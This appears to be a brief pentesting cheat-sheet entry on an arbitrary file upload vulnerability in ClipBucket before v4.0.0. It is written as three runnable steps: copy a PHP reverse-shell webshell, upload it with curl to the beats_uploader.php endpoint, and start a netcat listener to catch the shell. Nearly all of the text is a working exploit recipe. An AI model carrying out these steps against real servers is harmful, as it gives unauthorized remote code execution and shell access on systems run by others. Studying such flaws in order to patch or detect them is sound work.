ClipBucket Pentesting
Arbitrary File Upload < v4.0.0
1. Prepare Payload
cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php2. Upload the Payload
curl -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" "https://example.com/actions/beats_uploader.php"3. Reverse Shell
nc -lvnp 4444Last updated